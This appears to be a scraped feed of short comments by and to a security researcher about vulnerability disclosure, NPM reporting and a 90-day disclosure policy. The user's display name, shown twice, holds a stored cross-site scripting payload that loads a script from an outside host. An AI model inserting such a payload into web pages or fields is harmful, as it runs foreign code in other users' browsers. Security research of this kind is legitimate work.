Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Ah, glad @aibaars got in touch with you! 🎉
I've reported this issue to the NPM security team via their package vulnerability disclosure process, they should be following up.
A discussion on this topic has been raised here: https://matrix.to/#/!rqjZtudXEGTclzhLdC:yaml.io/$027ItPjse90RwvnDmX9CHKjw_J4o3LNOKMH5YNmelLw?via=yaml.io&via=matrix.org&via=mozilla.org
Thanks, I work for a networking company so they float through our API's a lot. I guess that it makes sense that it isn't all that common in the rest...
Sounds like a bug in the OS's window management software.
It's under the "About" dialog isn't it?
Hahah. Oh, you're right.
Originally, my disclosure policy was the following: > **This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure...